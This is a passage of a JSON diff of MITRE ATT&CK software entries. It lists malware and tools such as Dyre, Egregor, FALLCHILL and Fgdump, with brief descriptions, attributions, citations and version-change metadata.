Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.", + "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf" + }, + { + "source_name": "Malwarebytes Dyreza November 2015", + "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020.", + "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/" + }, + { + "source_name": "Sophos Dyreza April 2015", + "description": "Ducklin, P. (2015, April 20). Notes from SophosLabs: Dyreza, the malware that discriminates against old computers. Retrieved June 16, 2020.", + "url": "https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Dyre", + "Dyzap", + "Dyreza" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Josh Campbell, Cyborg Security, @cyb0rgsecur1ty" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:34.862000+00:00\", \"old_value\": \"2025-04-16 20:38:13.036000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--e928333f-f3df-4039-9b8b-556c2add0e42", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-18 16:15:53.977000+00:00", + "modified": "2025-04-25 14:44:59.309000+00:00", + "name": "ECCENTRICBANDWAGON", + "description": "[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.(Citation: CISA EB Aug 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0593", + "external_id": "S0593" + }, + { + "source_name": "ECCENTRICBANDWAGON", + "description": "(Citation: CISA EB Aug 2020)" + }, + { + "source_name": "CISA EB Aug 2020", + "description": "Cybersecurity and Infrastructure Security Agency. (2020, August 26). MAR-10301706-1.v1 - North Korean Remote Access Tool: ECCENTRICBANDWAGON. Retrieved March 18, 2021.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ECCENTRICBANDWAGON" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:59.309000+00:00\", \"old_value\": \"2025-04-16 20:38:41.289000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--292eb0c5-b8e8-4af6-9e8f-0fda6b4528d3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-18 18:56:41.244000+00:00", + "modified": "2025-04-25 14:42:53.604000+00:00", + "name": "Ecipekac", + "description": "[Ecipekac](https://attack.mitre.org/software/S0624) is a multi-layer loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2019 including use as a loader for [P8RAT](https://attack.mitre.org/software/S0626), [SodaMaster](https://attack.mitre.org/software/S0627), and [FYAnti](https://attack.mitre.org/software/S0628).(Citation: Securelist APT10 March 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0624", + "external_id": "S0624" + }, + { + "source_name": "HEAVYHAND", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "SigLoader", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "DESLoader", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "Securelist APT10 March 2021", + "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.", + "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ecipekac", + "HEAVYHAND", + "SigLoader", + "DESLoader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:53.604000+00:00\", \"old_value\": \"2025-04-16 20:37:59.458000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--cc4c1287-9c86-4447-810c-744f3880ec37", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-29 21:32:27.939000+00:00", + "modified": "2025-04-25 14:44:43.318000+00:00", + "name": "Egregor", + "description": "[Egregor](https://attack.mitre.org/software/S0554) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between [Egregor](https://attack.mitre.org/software/S0554) and Sekhmet ransomware, as well as [Maze](https://attack.mitre.org/software/S0449) ransomware.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)(Citation: Security Boulevard Egregor Oct 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0554", + "external_id": "S0554" + }, + { + "source_name": "Egregor", + "description": "(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)" + }, + { + "source_name": "NHS Digital Egregor Nov 2020", + "description": "NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.", + "url": "https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary" + }, + { + "source_name": "Cyble Egregor Oct 2020", + "description": "Cybleinc. (2020, October 31). Egregor Ransomware \u2013 A Deep Dive Into Its Activities and Techniques. Retrieved December 29, 2020.", + "url": "https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/" + }, + { + "source_name": "Security Boulevard Egregor Oct 2020", + "description": "Meskauskas, T.. (2020, October 29). Egregor: Sekhmet\u2019s Cousin. Retrieved January 6, 2021.", + "url": "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Egregor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security", + "Matt Brenton, Zurich Insurance Group" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:43.318000+00:00\", \"old_value\": \"2025-04-16 20:38:36.019000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6b62e336-176f-417b-856a-8552dd8c44e1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:58.738000+00:00", + "modified": "2025-04-25 14:43:41.197000+00:00", + "name": "Epic", + "description": "[Epic](https://attack.mitre.org/software/S0091) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0091", + "external_id": "S0091" + }, + { + "source_name": "Epic", + "description": "(Citation: Kaspersky Turla)" + }, + { + "source_name": "Tavdig", + "description": "(Citation: Kaspersky Turla)" + }, + { + "source_name": "Wipbot", + "description": "(Citation: Kaspersky Turla)" + }, + { + "source_name": "WorldCupSec", + "description": "(Citation: Kaspersky Turla)" + }, + { + "source_name": "TadjMakhal", + "description": "(Citation: Kaspersky Turla)" + }, + { + "source_name": "Kaspersky Turla", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.", + "url": "https://securelist.com/the-epic-turla-operation/65545/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Epic", + "Tavdig", + "Wipbot", + "WorldCupSec", + "TadjMakhal" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Martin Smol\u00e1r, ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:41.197000+00:00\", \"old_value\": \"2025-04-16 20:38:15.497000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "tool", + "id": "tool--ca656c25-44f1-471b-9d9f-e2a3bbb84973", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-02-19 19:17:14.971000+00:00", + "modified": "2025-04-25 14:45:29.018000+00:00", + "name": "Expand", + "description": "[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0361", + "external_id": "S0361" + }, + { + "source_name": "Microsoft Expand Utility", + "description": "Microsoft. (2017, October 15). Expand. Retrieved February 19, 2019.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand" + }, + { + "source_name": "Palo Alto Networks BBSRAT", + "description": "Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Expand" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:29.018000+00:00\", \"old_value\": \"2025-04-16 20:38:56.328000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--6a21e3a4-5ffe-4581-af9a-6a54c7536f44", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-02-08 21:41:25.501000+00:00", + "modified": "2025-04-25 14:43:40.097000+00:00", + "name": "Explosive", + "description": "[Explosive](https://attack.mitre.org/software/S0569) is a custom-made remote access tool used by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123). It was first identified in the wild in 2015.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0569", + "external_id": "S0569" + }, + { + "source_name": "Explosive", + "description": "(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) " + }, + { + "source_name": "CheckPoint Volatile Cedar March 2015", + "description": "Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf" + }, + { + "source_name": "ClearSky Lebanese Cedar Jan 2021", + "description": "ClearSky Cyber Security. (2021, January). \u201cLebanese Cedar\u201d APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.", + "url": "https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Explosive" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:40.097000+00:00\", \"old_value\": \"2025-04-16 20:38:15.035000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--fece06b7-d4b1-42cf-b81a-5323c917546e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:45:10.924000+00:00", + "name": "FALLCHILL", + "description": "[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0181", + "external_id": "S0181" + }, + { + "source_name": "FALLCHILL", + "description": "(Citation: US-CERT FALLCHILL Nov 2017)" + }, + { + "source_name": "US-CERT FALLCHILL Nov 2017", + "description": "US-CERT. (2017, November 22). Alert (TA17-318A): HIDDEN COBRA \u2013 North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-318A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FALLCHILL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:10.924000+00:00\", \"old_value\": \"2025-04-16 20:38:45.711000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--0e18b800-906c-4e44-a143-b11c72b3448b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:42.171000+00:00", + "name": "FLIPSIDE", + "description": "[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0173", + "external_id": "S0173" + }, + { + "source_name": "FLIPSIDE", + "description": "(Citation: Mandiant FIN5 GrrCON Oct 2016)" + }, + { + "source_name": "Mandiant FIN5 GrrCON Oct 2016", + "description": "Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.", + "url": "https://www.youtube.com/watch?v=fevGZs0EQu8" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FLIPSIDE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:42.171000+00:00\", \"old_value\": \"2025-04-16 20:37:55.971000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--434ba392-ebdc-488b-b1ef-518deea65774", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-22 14:20:30.164000+00:00", + "modified": "2025-04-25 14:43:07.972000+00:00", + "name": "FYAnti", + "description": "[FYAnti](https://attack.mitre.org/software/S0628) is a loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2020, including to deploy [QuasarRAT](https://attack.mitre.org/software/S0262).(Citation: Securelist APT10 March 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0628", + "external_id": "S0628" + }, + { + "source_name": "DILLJUICE stage2", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "Securelist APT10 March 2021", + "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.", + "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FYAnti", + "DILLJUICE stage2" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:07.972000+00:00\", \"old_value\": \"2025-04-16 20:38:04.305000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--bb3c1098-d654-4620-bf40-694386d28921", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:52.470000+00:00", + "modified": "2025-04-25 14:44:33.289000+00:00", + "name": "FakeM", + "description": "[FakeM](https://attack.mitre.org/software/S0076) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0076", + "external_id": "S0076" + }, + { + "source_name": "Scarlet Mimic Jan 2016", + "description": "Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FakeM" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:33.289000+00:00\", \"old_value\": \"2025-04-16 20:38:32.986000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-24 13:23:45.162000+00:00", + "modified": "2025-04-25 14:43:21.871000+00:00", + "name": "FatDuke", + "description": "[FatDuke](https://attack.mitre.org/software/S0512) is a backdoor used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2016.(Citation: ESET Dukes October 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0512", + "external_id": "S0512" + }, + { + "source_name": "ESET Dukes October 2019", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FatDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:21.871000+00:00\", \"old_value\": \"2025-04-16 20:38:08.387000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:46.344000+00:00", + "name": "Felismus", + "description": "[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0171", + "external_id": "S0171" + }, + { + "source_name": "Felismus", + "description": "(Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)" + }, + { + "source_name": "Symantec Sowbug Nov 2017", + "description": "Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.", + "url": "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + }, + { + "source_name": "Forcepoint Felismus Mar 2017", + "description": "Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.", + "url": "https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Felismus" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:46.344000+00:00\", \"old_value\": \"2025-04-16 20:37:57.048000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--73d08401-005f-4e1f-90b9-8f45d120879f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-02-01 19:19:26.408000+00:00", + "modified": "2025-04-25 14:43:45.868000+00:00", + "name": "Ferocious", + "description": "[Ferocious](https://attack.mitre.org/software/S0679) is a first stage implant composed of VBS and PowerShell scripts that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0679", + "external_id": "S0679" + }, + { + "source_name": "Kaspersky WIRTE November 2021", + "description": "Yamout, M. (2021, November 29). WIRTE\u2019s campaign in the Middle East \u2018living off the land\u2019 since at least 2019. Retrieved February 1, 2022.", + "url": "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ferocious" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:45.868000+00:00\", \"old_value\": \"2025-04-16 20:38:17.322000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:10.569000+00:00", + "modified": "2025-04-25 14:45:18.484000+00:00", + "name": "Fgdump", + "description": "[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0120", + "external_id": "S0120" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Fgdump" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:18.484000+00:00\", \"old_value\": \"2025-04-16 20:38:51.728000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a2282af0-f9dd-4373-9b92-eaf9e11e0c71", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-31 00:23:06.022000+00:00", + "modified": "2025-04-25 14:44:16.040000+00:00", + "name": "Final1stspy", + "description": "[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0355", + "external_id": "S0355" + }, + { + "source_name": "Final1stspy", + "description": "(Citation: Unit 42 Nokki Oct 2018)" + }, + { + "source_name": "Unit 42 